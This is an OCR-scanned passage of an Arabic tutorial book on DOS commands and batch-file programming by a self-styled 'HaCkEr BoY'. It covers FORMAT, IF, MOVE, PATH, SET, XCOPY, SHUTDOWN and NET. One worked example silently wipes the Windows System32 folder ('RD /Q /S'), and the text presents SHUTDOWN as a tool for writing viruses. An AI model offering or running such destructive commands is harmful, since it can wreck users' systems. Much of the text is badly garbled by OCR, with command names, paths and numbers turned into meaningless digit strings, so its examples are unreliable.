/١7:1351‏ لتغيير اسم السواقة» وليس حرفها. 

حطع ]1511535 لتغيير نظام ملفات السواقة. 

مثال: 


نريد فرمتة السواقة (1 فرمتة سريعة (مسح سريع) و تغيير اسمها إلى 1120166803 و تغيير نظام ملفاتها 
إلى N1۴58‏ نكتب: 


FORMAT 0: /Q/V:HackerBoy /FS:NTFS 


ملاحظة: لا يمكن استخدام الخيارين /Q‏ و لا/ معأء لأنه منطقياً كيف للمسح أن يكون سريع و بطئ في نفس 
الوقت؟ 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


17 FTYPE: 
لعرض أنواع مشغلات الملفات الموجودة في النظام» و مسارات برامج التشغيل.‎ 
بصورة أبسط..‎ 


رأينا في أول الكتاب في الأمر 855060 أنواع الملفات و أسماء مشغلاتهاء حيث وجدنا أن مشغل الملفات 
ذات اللاحقة.11711 هو :212133 » و بواسطة الأمر ۴۲۷۲۴۴ يمكننا معرفة مسار 71213361 على الجهاز» و 
هو: 


MPlayer=mplay32.exe /play /close "960[1"‏ 
الآن..» لتعريف نوع جديد من الملفات (كما ذكرنا في الأمر 485506©0) نكتب الأمر 
ASSOC .SAZ=Samer‏ 
و لتعريف المسار الذي يعمل منه 531361 نفعل ذلك بواسطة الأمر ۴۲۷۴۴ كالتالي: 
FTYPE Samer="c:\programfiles\samer\samer.exe" "90917‏ 
كما يمكننا استخدام متغيرات ويندوز أثناء تعريف المسار(سيتم شرح المتغيرات في فقرة الأمر ٣٤؟).‏ 
GOTO:‏ ¥ 
من أوامر الملفات الدفعية» يقوم بالقفز إلى نقطة ما أو سطر ما في الصفحة البرمجيةء شكله العام: 


GOTO Label 


1 هو المكان الذي سوف يقفز إليه البرنامج» مثال: 


GOTO WWW 


:WWW 


حيث يجب وضع نقطتين قبل الكلمة التي أشرنا للبرنامج (أي الملف الدفعي) أن يقفز إليها. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


y HEIP: 


للحصول على التعليمات» كما يمكننا الحصول على التعليمات حول أي أمر في دوس بأن نكتب بعده ?/ » 
فبكلاً للحصول على تعليماتك حول أمر 6010 تكتب: 


GOTO /?‏ 
Yy IF:‏ 
أمر يستخدم في الملفات الدفعية» حيث يقوم بتنفيذ أمر ما عند تحقق شرط ماء وله ثلاث صيغ هي: 
IF [NOT] ERRORLEVEL number command‏ 


IF [NOT] string1==string2 command 


IF [NOT] EXIST filename command 


01 تجعل النظام يقوم بالأوامر فقط إن كان الشرط خاطيء»ء وإن لم نضعها فسيقوم النظام بتنفيذ الأوامر 
عند تحقق الشرط. 


ERRORLEVEL‏ نكتبها عندما نكون بصدد وضع اختيارات عدة يختار المستخدم أحدها (سأقوم بالتفصيل 


1 هو رقم الاختيار الذي أدخله المستخدم. 
01340 و هو الأمر الذي نريد تنفيذه إذا ضغط المستخدم رقم كذا. 
مثال: 


IF ERRORLEVEL 1 GOTO SAZ 


:SAZ 


CLS 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


EXIT 


ومعنى الكود السابق» أنه إذا أدخل المستخدم رقم 1 اذهب إلى 947 وعندما يذهب البرنامج إلى 5.87 
سوف يتم تنفيذ الأوامر الموجودة في تلك النقطة وهي 1.8© أي مسح الشاشة» 5×1١‏ الخروج من البرنامج. 


أما الصيغة الثانية من الصيغ السابقة فتعني: إن كان النصان متشابهان قم بتنفيذ الأوامر. 
و الصيغة الثالثة تعني: إن كان الملف موجود قم بتنفيذ الأوامر..» مثال على الصيغة الثالثة: 


IF EXIST c:\ww.exe GOTO SAZ 


:SAZ 
DEL /Q c:\ww.exe 


ومعنى ذلك أنه إن كان الملف #×ه.س سا:٥‏ موجود (أي إن كان في المسار المحدد ملف بهذا الاسم)؛ اذهب 
إلى العلامة 5.48: وعند ذهابه إلى العلامة سيقوم بتنفيذ الأوامر الموجودة داخلها وهي حذف الملف 


ععاء .0:17 دون تنبيه(0/). 
LABEL:‏ ¥ 
يقوم بعرض أو تعديل اسم سواقة» فلتعديل اسم السواقة :© إلى 94۷٤۸‏ نكتب الأمر: 
LABEL c:SAMER‏ 
كما يمكن للأمر أن يأخذ الصيغة التالية: 


LABEL /MP volume label 


۴/ خيار يشير إلى أننا نريد 
16 وهو الحرف الخاص بالسواقة. 


1 هو اسم السواقة. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr_BoY^‏ 


0 MD: 
أمر لصناعة مجلدء فإذا أردنا إنشاء مجلد اسمه 953261 على السواقة :© نكتب:‎ 
MD c:\Samer 
ويمكننا أن ننشئ عدة مجلدات متداخلة في نفس الأمرء فإن عدلنا الأمر السابق ليصبح:‎ 


MD c:\Samer\Bakkr\Hacker\Boy 


سيقوم وندوس بإنشاء مجلد على السواقة ٥:‏ اسمه 5320617 و سينشئ داخل المجلد 531261 مجلد آخر اسمه 
Bakkar‏ و هكذاء جرب الأمر بنفسك. 


7 MKDIR: 
نفين الأمر السابق تماماً.‎ 

7١ MODE: 
يقوم بعرض حالة منافذ توصيل الأجهزة المتوفرة في الكومبيوتر مثل 0111© و ۴۲1[ الخ.‎ 

7١ MORE: 


خاص بقراءة الملفات» وهو قليل الاستخدام» و بصراحة لم ولن أستخدمه في حياتيء لذلك لن أقوم بشرحه» 
فهو عديد التفرعات دون فائدة. 


7 MOVE: 


من الأوامر الجميلة» له وظيفتان» الأولى هي نقل ملف أو أكثر من مكان إلى آخرء و الثانية هي إعادة تسمية 
ملف أو مجلدء أما بالنسبة للوظيفة الأولى» فلها الصيغة التالية: 


MOVE /Y /-Y C:\MyFolder D:\MyFolder 


ل/ خيار يشير إلى نقل الملفات دون تأكيد عند وجود مجلد بنفس الاسم أو ملفات للقراءة فقط. 


لا-/ عكس الخيار السابق. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


101 هو المجلد الذي نريد نقله» مع ملاحظة أنه يجب وضع المسار كاملاً. 


:101 وهو المكان الجديد للمجلد. 


أما لتغيير اسم المجلد أو الملف فنتبع الصيغة التالية: 


MOVE /Y /-Y C:\MyFolder C:\YourFolder 


نلاحظ أن الأمر لم يتغير فيه شئ إلا أننا وضعنا الاسم الجديد للمجلد بدلا من مكانه الجديدء ۷-/ ۷/ يأخذان 
نفس العمل الذي أخذاه في الصيغة السابقة (نقل مجلد). 


و لتغيير اسم ملف نستخدم نفس الصيغة التي نستخدمها لتغيير اسم المجلدء ولكن بدل اسم المجلد نكتب اسم 
الملف مع الصيغة أي 58358. أو.61۴ أو غيرها من الصيغء أو بإمكاننا استخدام المر RENAME‏ الذي 


سنتحدث عنه لاحقاً. 
7١ PATH:‏ 


إن الملفات التنفيذية عندما تعمل فإنها تبحث عن ملفات الدعم التي تحتاجهاء مثل مكتبات 011 أو أدوات 
0٣×‏ أو غيرها من الملفات التي تكون ضرورية لعمل البرنامج بشكل سليم» وعندما تبدأ عملية البحث فإنها 
تتوجه إلى مجلدات افتراضية يحددها نظام التشغيل متل C:\WINDOWS\syste¬32‏ و C:\WINDOWS‏ و 
تمع C:\WI]N DOWNS ystem32\W‏ وغيرها... 


و الأمر الأخير (۶۸13)» يفيد في معرفة هذه المجلدات الافتراضية التي ستبحث فيها البرامج عن المكتبات و 
ملفات الدعم الخاصة بهاء كما يمكن إضافة مجلدات أخرى أو إزالة أخرى. 


لعرض هذه المجلدات» يكتب الأمر ۴۸18 دون إضافات. 


لمسح قائمة المجلدات هذه (وهو أمر خطير)ء نكتب الأمر: 
PATH;‏ 


أما للتعديل على القائمة (إضافة مجلد آخر مثلاً) نكتب الأمر : 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


PATH C:\MyFolder %PATH% 


فبالأمر السابق أضفنا المجلد إءل1ه ۴ر[ الموجود على السواقة :0 لكي تبحث فيه البرامج عن ملفات دعم 
خاصة بها عند إقلاعهاء و الكلمة 95/411196 تشير إلى أننا نريد إضافة المجلد المذكور إلى القائمة الموجودة 
أصلاء وإن لم نكتبها فإننا نكون قد مسحنا القائمة و وضعنا المجلد الذي ذكرناه بدلا منهاء وهذا أمر من شأنه أن 
يضر بعمل البرامج الموجودة على النظام ضرراً قاتلاً. 


¥ PAUSE: 
أمر خاص بالملفات الدفعية» وظيفته إظهار الرسالة التالية:‎ 
Press any key to continue . . . 
أي اضغط أي زر للمتابعة.‎ 


y PUSHD: 
¥ POPD: 


أمر يفيد في الانتقال إلى فهرس آخر دفعة واحدة (انتقال سريع)ء مع إمكانية العودة إلى الفهرس السابق 
باستخدام الأمر (207[1. 


أعلم أن الكلام غير مفهوم» لذلك سأوضح ذلك بمثال. 
لنفرض أننا نعمل على الفهرس 
C:\Documents and Settings\SamerBakkar\Desktop>‏ 


و أريد الانتقال إلى الفهرس ءعهإ۴ 5:11٥)‏ لأجري بعض الأوامرء ولكني إما لا أريد أن أنسى أين كنت.. 
(أي الموقع الذي كنت فيه قبل أن أنتقل إلى الفهرس الثاني)» أو أني لا أريد أن أكتب كل هذا السطر (أي المكان 
أو الفهرس الأول)» الآن أكتب الأمر: 


PUSHD D:\HackProgs 


فينتقل بي دوس إلى السواقة :5 المجلد كعهإ۴ )ء1 الآن أجري أوامري و أفعل ما أريد أن أفعل» وعندا 


POPD 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


لأجد نفسي ثانية في الفهرس الذي كنت فيه سابقاًء و الذي هو: 


C:\Documents and Settings\SamerBakkar\Desktop 


إن الأمر (2]79111 قام بتخزين الفهرس الذي كنت عليه أول الأمر في الذاكرةء ثم نقلني إلى المجلد الثاني» و 
الأمر ۴0۴5 قام باسترجاع الفهرس الذي خزنه الأمر ۴0512 و نقلني إليه مرة أخرى. 


yJ PRINT: 


يقوم هذا الأمر بطباعة ملف نصيء فلو فرضنا أن لدينا الملف النصي ١۲×1.ع‏ ۲561ء )ء1 الموجود على 
السواقة :2 » فلطباعة هذا الملف بواسطة الأمر 2101271 نكتب الأمر التالي: 


PRINT D:\HackersGuide. TXT 


مع ملاحظة أننا يمكن أن نطبع كافة أنواع الملفات النصية مثل .00€٥‏ و ©. و غيرها من أنواع الملفات 
النصية. 


y PROMPT: 


وظيفة هذا الأمر تغبير المحث (أي ما يكون مكتبا قبل المكان الذي نكتب نحن فيه الأوامر)» فالمحث 
الافتراضي هو <:0) و إن كنا نعمل على السواقة (1 سيكون المحث <ا:0 إذا أردنا تغيير هذا المحث إلى 
1 مثلا فإننا نكتب الأمر: 


PROMPT Samer 
الآن سيظهر شكل المحث كالتالي:‎ 
Samer 


و ستتم كتابة الأوامر بعد كلمة 531261 مباشرة» و بالإمكان إظهار رموز مخصصة سأقوم بذكر الأهم منها 
في التالي: 


0 التاريخ الحالي. 


97 السواقة الحالية. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_BoY^‏ 


$ السواقة و المسار. 
1 الوقت الحالي. 
7 اسم و إصدارة نظام التشغيل. 


فمثلا إذا أردنا إظهار المحث على شكل السواقة و المسار فإننا نكتب الأمر: 


PROMPT $P 
و عندها سيظهر المحث على الشكل التالي:‎ 
ادق‎ 
و لإعادة المحث إلى حالته الافتراضية نكتب الأمر '210017/171 دون إضافات.‎ 
لا‎ RD: 


لإزالة مجلدء وهو يأخذ الصيغة التالية: 
RD ]/5[ ]/0[ Dir‏ 
8 لإزالة كافة محتويات المجلد من ملفات و مجلدات فرعية. 
/٩‏ خيار إذا أضفناه سيقوم الأمر بالحذف دون إعطاء رسالة تنبيه. 
ؤ2 وهو المجلد الذي نريد حذفه. 
فمثلا..» لإزالة المجلد 
C:\Windows\System32‏ 


و حذف كافة محتوياته من ملفات و مجلدات فرعيةء دون تنبيه (أي الحذف دون تأكيد أو سؤال لأخذ الموافقة) 
نكتب الأمر التالي: 


RD /Q /S C:\Windows\System32 
y RMDIR: 


نفس الأمر السابق تماماً. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


¥ RECOVER: 
أمر يفحص سواقة ما محاو لا استعادة أجزاء الملفات المفقودةء ويكتب كالتالي:‎ 
RECOVER D: 
7١ REM: 


يستخدم في الملفات الدفعية» ووظيفته إظهار الملاحظات أو التعليقات» والفرق بينه و بين الأمر 861710 أن 
الأمر 80110 يقوم بعرض الملاحظة دون إظهار المسار للمستخدم» بينما يقوم الأمر ۸٤١‏ بعرض المسار الذي 
يعمل منه الملف الدفعي مع الملاحظة أو التعليق» ويستخدم كالتالي: 


REM This Batch File Has Been Created By ^HaCkEr BoY^ 


و ستتضمن نتيجة الأمر المحثء و المسار الكامل للمجلد أو الفهرس الذي عمل منه الملف الدفعي» بالإضافة 
إلى التعليق. 


لإعادة تسمية ملف ويستخدم كالتالي: 


REN D:\HackersUtility.exe HackersTool.exe 


لاحظ كيف أننا كتبنا أولا الأمر ۸٤×‏ ثم ذكرنا مسار و اسم الملف الذي نريد إعادة تسميته» ثم الاسم الجديد 
للملف. 


y RENAME: 
تشن الأمن السابق تماماء وله تقس .ظريقة الاستخدام:‎ 


y REPLACE: 


أمر لاستبدال الملفات و المجلدات» يأخذ الصيغة التالية: 


REPLACE C:\Folder1l D:\Folder2 /A /P /R /5 /W /U 


1 هو المجلد(ويمكن أن يكون ملف) الأول المصدر الذي نريد أن نستبدل به مجلد آخر. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


72 هو المجلد الهدف الذي نريد استبداله. 

4/ يضيف ملفات جديدة إلى المجلد الهدف» إن هذا الخيار لا يمكن استخدامه مع الخيار 5/ أو مع الخيار [1/. 
۴/ لعرض تنبيه قبل استبدال الملفات» وسؤال المستخدم هل يريد استبدالها أم لا. 

۸/ لاستبدال الملفات ذات الصفة (للقراءة فقط)» كما لو كانت ملفات عادية. 


5 لاستبدال كافة الملفات و المجلدات الفرعية الموجودة في المجلد الهدفء لا يمكن استخدام هذا الخيار مع 
الخيار ۸/ 


[]/ لاستبدال التحديتات فقطء أي الملفات التي تحمل تاريخ تعديل أو إصدار أحدث دون التعرض للملفات 
المتشابهة بالتاريخ أو الأقدم» إن هذا الخيار لا يمكن استخدامه مع الخيار ۸/. 


7١ SET: 


من الأوامر الجميلة» يعمل هذا الأمر على إظهار المتغيرات الموجودة في بيئة ويندوزء و المتغير هو أي 
شرط أو حدث أو صفة يمكن أن يأخذ قيمأ متعددةء أي أن ( متغير) تشير إلى إمكانية تغير القيمة الخاصة به. 


إن لبيئة ويندوز متغيرات عديدة» منها 1771011 وهو مجلد ویندوز»› و 11/2 1' وهو المجلد الخاص بالملفات 


n 


وة انس تصهها الرس اقرع على الجياز» 3 خزيليا بعد الانثياء: مفياة ر 096۸A M8‏ وهو ان 


نعود للأمر 587 قلنا أن هذا الأمر يعمل على إظهار المتغيرات الموجودة في بيئة ويندوزء إذا كتبنا الأمر 
7 دون أي إضافات» سيعرض لنا (0S‏ كافة المتغيرات دفعة واحدة. لكننا إن أردنا معرفة متغير واحد فقط 
فيكون الأمر كالتالي: 
SET USERNAME‏ 
هذا لمعرفة اسم المستخدم» ويكون: 


SET ProgramFiles 


إذا أردنا معرفة المسار الافتراضي التي تنزل فيه البرامج. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


© تعديل قيمة متغير: 


نلاحظ أن الأمر 22111165ع2:0 S٤1‏ قد عاد بقيمة» إن هذه القيمة قابلة للتعديل» فلو أردنا تعديل المسار 
الافتراضي لتنصيب البرامج إلى المجلد ۴۸06۴11۴8 الموجود على السواقة 7:١‏ نكتب الأمر التالي: 


SET ProgramFiles=F:\ PROGFILES 
و هكذا يتم تغيير قيمة المتغيرات؛ و يكون الشكل العام لهذه العملية كالتالي:‎ 
S۴1 القيمة الجديدة للمتغير-اسم المتغير‎ 
إنشاء متغير:‎ © 


يمكن إنشاء متغير باستخدام الأمر 81٤S؟»‏ لكن هذا المتغير سيدخل ضمن متغيرات بيئة ويندوز» و سيحجز 
مساحة من الذاكرة خاصة بهو طريقة إنشاء متغير باستخذام الأمر 887 + تأخذ الصيغة التالية: 


SET Samer=I Am HaCkEr BoY 


نلاحظ كيف كان التسلسل» أولا الأمر S81‏ و بعدها اسم المتغير الذي نريد تعريفه» ثم إشارة يساوي = ثم 
قيمة المتغير. 


ه استخدام قيمة متغير: 


إن الهدف وجود و تعديل و إنشاء كافة المتغيرات هو استخدام القيم التي تحملهاء ويمكن استخدام أي متغير بأن 
نضع اسمه بين إشارتي %% » فمثلاء إذا أردنا استخدام المتغير السابق 531061 نستخدمه كالتالي: 


ECHO %Samer% 
و ستكون نتيجة الأمر السابق هي طباعة الجملة:‎ 
I Am HaCkEr BoY 


على الشاشة؛ ويجب ملاحظة أنه عند التعامل مع المتغيرات هناك فرق بين الأحرف الكبيرة و الصغيرة» 
فكلمة 537 تختلف عن 537. 


هناك متغيرات أخرى يوفرها ويندوز مثل: 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


0 وهو يحمل قيمة التاريخ كما تظهر في الأمر 05۸1۴. 
11 و يحمل قيمة الوقت الحالي كما يعيده الأمر .۲1M٤‏ 


y SETLOCAL: 
y ENDLOCAL: 


يستخدمان في الملفات الدفعية» الأمر الأول يفيد في تخصيص متغيرات الملف الدفعي للملف الدفعي فقط؛» و 
الثاني لإزالة هذه الصفةء إن ما سيتم تخصيصه للملف الدفعي يجب أن يتوضع (يقع) بعد الأمر SET1LOCAL‏ 
و كل ما كان قبله لا يؤخذ بالحسبان. 


y SHIFT: 


يستخدم في الملفات الدفعيةء يقوم بتغيير ترتيب الرموز الخاصة القابلة للتغير في الملف الدفعي» مثل 9% أو 
غيرها من الرموز التي تشير إلى مكان العمل أو ما تم إنجازه منهء وله الصيغة: 


SHIFT /N 
حيث 71 هي قيمة عددية سيبدأ منها الأمر '5111571» فمثلا إذا كتبنا:‎ 
SHIFT 4 
سيتم تجاهل القيم 3 و2 و1 و 0» و سيتم البدء ب4.‎ 
¥ SORT: 


أمر خاص بالترتيب كما هو واضح» استعمل 18/ للترتيب ترتيبا تنازليا من 7 إلى ۸ ومن 9 إلى 0. 
SORT /R C:\PassList.txt C:\PassListSorted.txt‏ 
سيرتب الملف ترتيبا تنازليا و يخزنه في الملف الثاني . 


وإن أردت أن ترتب ترتيبا تصاعدياء فببساطة لا تضع ۸/ » إن هذا الأمر نادر الاستخدام حاليآء ولكن يمكن 
الاستفادة منه. 
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كتاب دوس .. وصولا لبرمجة الملفات الدفعية ^HaCkEr_ BoY^‏ 


7١ START: 
أمر لتشغيل برنامج آخر في نافذة جديدةء فمثلاًء لتشغيل نافذة دوس جديدة اكتب:‎ 
START Command 
و لتشغيل المفكرة نكتب:‎ 
START NotePad 
لهذا الأمر بعض التفرعات (الخيارات) التي ربما تكون مفيدةء سأذكر أهمها:‎ 
لتشغيل البرنامج بشكل مصغر.‎ / N 
بشكل مكبر.‎ 6 
بشكل عادي.‎ 701341 
تشغيل البرنامج و الانتظار من أجل إصدار أمر.‎ / 1 
ويوضع بعد 91۸۸1 لتحديد العنوان الذي سيظهر للبرنامج عندما يعمل.‎ “111111” 
y TIME: 


لعرض وإعادة ضبطء اكتب الأمر 7138417 » إذا أردت تغيير الوقت أي إعادة ضبطه»ء فأدخل الوقت الجديدء 


وإن لم ترد» فاضغط زر 124617 دون كتابة أي 56 
7١ TITLE:‏ 


لتغيير عنوان صفحة الدوسء افتح دوس و اكتب ۰11۲1۴٤ “$4٤۲۶‏ واضغط 1104617 ماذا حدث؟ 


لاحظ أن عنوان الصفحة (الشريط الأزرق في أعلى الصفحة) قد تغير إلى إعمصهS؟»‏ وهكذا يكون شكل هذا 
الأمر كالتالي: 


TITLE “YourTitle” 
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Jy TREE: 


يقوم بعرض كافة مكونات جهاز الكومبيوتر من مجلدات و ملفات على شكل شجري (متفرع)» ولهذا الأمر 
عدد من الخيارات أهمها: 


8/ لاستخدام أرقام اسكي أثناء العرض. 


۴/ لإظهار اسم الملفات في كل مجلد. 


¥ TYPE: 
يستخدم لعرض محتويات ملف نصيء فلقراءة ملف نصي ما نتبع الصيغة:‎ 
TYPE C:\AnyTextFile.txt 
08 VER: 
أمر يقوم بإحضار إصدار الويندوس» يكتب دون أي إضافات.‎ 
y VOL: 


يقوم هذا الأمر بعرض عنوان و الرقم الخاص بإحدى السواقات» فلإحضار عنوان و رقم السواقة :© مثلاً 


17701 
ليس للأمر أي تفرعات. 
XCOPY:‏ ¥ 
يقوم بنسخ ملف أو ملفات» أو مجلد من مكان لآخرء وتأخذ صيغته العامة الشكل التالي: 


XCOPY FilesToCopy NewPlace /A/P/S/V/E/W/C/Q/F/L/G/H/R/U/K/N/Y/-Y 


لاحظ كم من الخيارات يمكن استخدامها مع الأمر ٤٨0۴۷‏ وهناك حوالي سبع خيارات أخرى لم أتطرق 
لهاء لكن لا ترتعب من عددهاء فيمكنك استخدام الأمر 72600717 دون أي خيارات إضافية» كالتالي: 


XCOPY D:\Lim F:\ Lim 
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38 


و سيتم نسخ كافة محتويات المجلد الأول إلى المجلد الثاني. 


الآن لنعد لشرح خيارات الأمر السابق: 


11165100027 هو المجلد أو الملفات التي نريد نسخها مع المسار الكامل لها. 


1672186 هو المكان الذي نريد نسخ المجلد أو الملفات إليه. 


4/ ينسخ فقط ملفات الأرشيفء أو الملفات التي لها صفة (ملف أرشيف). 


/ للتنبيه قبل صنع أي ملف في المجلد الوجهةء أي قبل أن يتم نسخ الملف يجب أن يعطي المستخدم موافقة 


على النسخ. 


5/ نسخ المجلدات الفرعية الموجودة في المجلد المصدر بالإضافة للملفات الموجودة داخلهاء ويقبل المجلدات و 
الملفات الفارغة. 


15/ نفس الخيار 5/ لكنه لا يقبل الملفات و المجلدات الفارغة. 
7/ للتحقق من كل ملف جديد. 

۷/ ينذر المستخدم بأن يضغط أي زر قبل البدء بعملية النسخ. 
0/ لإكمال النسخ حتى إن وجدت أخطاء تعيق العملية. 

/٩‏ لعدم إظهار أسماء الملفات أثناء النسخ. 

۴/ لإظهار المسار الكامل للملفات و أسمائها أثاء النسخ. 

1/ إظهار الملفات التي سوف يتم نسخها. 

6/ السماح بنسخ الملفات المشفرة. 

11/ نسخ ملفات النظام و الملفات المخفية إن وجدت. 

۸/ الكتابة فوق الملفات ذات الصفة (للقراءة فقط). 


[]/ نسخ فقط الملفات الموجودة في المجلد الهدف. 
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1/ نسخ خصائص الملفات مع الملفات» لأن النسخ العادي سوف يعيد الخصائص إلى الحالة العادية 


.Normal 
النسخ باستخدام الأسماء القصيرة التي ينشئها دوس أثناء عملية النسخ.‎ N 
لا/ عدم التنبيه عند وجود ملفات بنفس الاسم في المجلد الوجهةء أي الكتابة فوقها دون تنبيه.‎ 
لا-/ التنبيه عند وجود مثل هذه الملفات.‎ 
¥ SHUTDOWN: 
وهو من الأوامر الجميلة التي سنتعامل معها عند صناعة الفيروسات» ولهذا الأمر الصيغة العامة التالية:‎ 
shutdown [-i | -1 | -s | - | -a] [-f] [-m \computername] [-t xx] [-c "comment"] 
و تفصيلات هذه الصيغة كالتالي:‎ 


ذ- لعرض إطار التحكم بإعادة التشغيل» يستخدم هذا الخيار منفرداً دون إضافته لأي خيار آخرء حاول كتابته و 
انط النتيجة: 


1- إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي تسجيل الخروج. 
5- إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي إيقاف تشغيل الجهاز. 
-٣‏ إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي إعادة تشغيل الجهاز. 


2- لإحباط عملية إيقاف التشغيل» فقد تتعرض أحياناً إلى العداد التنازلي الذي يشير إلى أن الجهاز سوف 
ينطفئ بعد كذا ثانية» لإلغاء العملية» افتح الدوس واكتب الأمر 2- 51117110015781 و سيتم إلغاءها. 


۴- لإغلاق كافة البرامج قيد التشغيل دون تنبيه» أي (هل تريد حفظ التغييرات قبل الإغلاق؟): هذا الخيار 
سيقوم بإغلاق البرامج المفتوحة دون عرض التنبيه السابق. 


211310 «- لتحديد الكومبيوتر الذي نريد تنفيذ الأمر عليه (هذا إن كنا نعمل على شبكة)» 
فلإعادة تشغيل الجهاز المسمى 209 نكتب الأمر: 


SHUTDOWN -r -m 9 


×× - لتغيير مدة العد التنازلي قبل إعادة التشغيل أو إيقاف التشغيل» وتمثل ×× الزمن الجديد بالثواني. 


Created By Samer Bakkar ^HaCkEr BoY^ 39 


كتاب دوس .. وصولا لبرمجة الملفات الدفعية  ^HaCkEr BoY^‏ 
”درو ء- لإضافة تعليق يظهر قبل إيقاف أو إعادة تشغيل الجهازء حيث ٣۴٣٥ء‏ هي التعليق الذي 
سيتم إضافته. 
NET:‏ 07 
هذا الأمر خاص بالتعامل مع الشبكات المحلية» وله تفرعات (خيارات) عديدة جداًء إذا أردت رؤيتها فاكتب 
الأمر: 
NET HELP‏ 
و سيتم عرضها لكء لكني لن أذكر منها إلا ما هو ذو فائدة (من وجهة نظري)» وهي: 
NET ACCOUNTS‏ 
يعرض قائمة بالسمات الخاصة بالحسابات مثل الحد الأدنى لكلمات السر (أي عدد الأحرف الأدنى)» والحد 
الأقصى لهاء وغير ذلك من هذه الخصائص. 
NET COMPUTER‏ 
لإضافة جهاز إلى الشبكة» أو حذف جهاز موجود بالفعل» ويأخذ الصيغة التالية: 
لإضافة جهاز: 
NET COMPUTER \ComputerName /ADD‏ 
إن N2‏ اputerصmد‏ هو اسم الجهاز الذي نريد إضافته. 
لإلغاء جهاز أو إزالته: 


NET COMPUTER \ComputerName /DEL 


NET USER 
لعرض قائمة الأجهزة الموجودة على الشبكة» وقائمة المستخدمين الموجودين على كل جهاز.‎ 
NET VIEW 


لعرض قائمة الأجهزة الموجودة على الشبكة المحليةء ورقم الأيبي الخاص بكل جهازء وحالة الاتصال. 
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y CHOICE: 


أمر من أوامر الملفات الدفعية» وظيفته عرض اختيار على المستخدم» أي إذا ضغط المستخدم كذا حدث كذاء 
وهو من الشكل: 


CHOICE /c:123 


If errorlevel 3 goto :ZZ 
IF errorlevel 2 goto :CH 


IF errorlevel 1 goto :HE 
نضع داخل 772: أوامر معينة» وداخل 151©: أوامر أخرى و هكذا..‎ 


في المثال السابق الاختيارات هي ثلاثةء إما 1 أو 2 أو 3 ولكن يمكن أن نضع حتى 9 اختيارات مختلفة. 


6 هبتاك عدد. من الأوامر الأخرى مثل. 58۴۸۸6 الذي يقوم بإلغاء تجزثة قرص ماء مقلا 


6 والأمر SCANREG‏ الذي يقوم بعمل نسخة احتياطية للنظام» و يتيح أيضا استعادة نسخة موجودة. 


6 و الأمر 7101516 الذي لا يمكن استخدامه إلا في نظام التشغيل دوس (عند بدء تشغيل الجهاز على 
دوس)» والذي يمكن بواسطته تقسيم القرص الصلب. 


بالإضافة إلى العديد من الأوامر الأخرى» فدوس نظام تشغيل كامل» ومن المستحيل الإلمام بجميع أوامره في 
مثل هذا الكتيب الذي يسعى إلى تعليم كتابة الملفات الدفعية» لكن ما هو موجود في هذا الكتاب» كاف لكتابة أفضل 
الملفات الدفعية. 


95 لإحظة: 


إن كان لديك أية اقتراحات أو أوامر ترى أنها ضرورية ولم يتم ذكرهاء أرجو إرسال الأمر فقط إلى البريد 
الالكتروني ليتم إضافة شرح للأمر في ملحق لهذا الكتاب» مع الشكر الجزيل مسبقاً. 
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vw‏ 
أ 1 چ آ 4 4ش 4ش 


Batch Fı1les 


۷ مقدمة للملفات الدفعية: 


الملفات الدفعية (كما ذكرنا سابقا)» هي ملفات تقوم بتأدية وظائف و أوامر مكتوبة داخلها بمجرد تشغيلهاء و 
الأوامر السابقة (أي أوامر 008)» كلها يمكن استخدامها في برمجة الملفات الدفعية. 


أرجو أن تتأكد من أنك قد حفظت (إلى حد ما) الأوامر السابقة» و إلا فعد إليها و راجعها مراجعة سريعة قبل 
البدء بهذا الجزءء حتى تفهم من أين آتي بالأوامر و ما هي وظائفهاء لأني لن أعيد ما ذكرته سابقاء إنما سأذكر ما 
هو جديد فقط (مع بعض المساعدة). 


لقد ذكرت في القسم السابق أوامر الملفات الدفعية على أنها من أوامر النظام 008 لأن الملفات الدفعية جز ء 
هام و حيوي من النظام دوس» إلا أنها لا تنفصل عنهء فكل ما يكتب داخل الملف الدفعي قليلا أو كثيراء يتعامل 
مع نظام دوس بشكل مباشر. 


قد تتساءلء» ما بال المؤلف؟ فتارة يقول دوس» وتارة ويندوز.. 
إن .دوس بالنسبة للملفات الدفعية يمكن أن يأحد شكلين: 


الأول هو نظام التشغيل دوسء الذي يقلع عليه الجهاز منذ بدء تشغيله. 
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الثاني هو دوس الموجود في ويندوزء الذي يدعى (إطار دوس). 


لكن كلا النوعين يتعامل مع الحاسب بشكل مباشرء و الملف الدفعي سيكون له نفس النتيجة إذا ما تم تشغيله 


تحت أي من النوعين. 


الجزء التالي هو عبارة عن مجموعة من البرامج التطبيقية التي ستمكنك من احتراف كتابة الملفات الدفعية 
معتمدة على 'حفظك" للجزء السابق» و 'فهمك" للجزء اللاحق» لذلك أطلب منك أن تجهز لنفسك "كاسة متة" و 
'تمخمخ" معي أثناء دراسة هذا القسم» فهو بحاجة لربط الأفكار» وأن تكون كافة المعلومات المتعلقة بهذا الموضوع 
والتي هي بحوزتك» حاضرة في ذاكرتك القريبة» إن كنت قد فهمت قصدي فتوكل على نعم الوكيل» وابدأ الجزء 
التالي. 
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البرنامج الأول باستخدام الملفات الدفعية 17115 ع8216: 


اصنع ملف نصي جديدء أو افتح المفكرة المرفقة مع 777120101775 و ذلك بضغط زر ابدأ ثم تشغيل» اكتب 
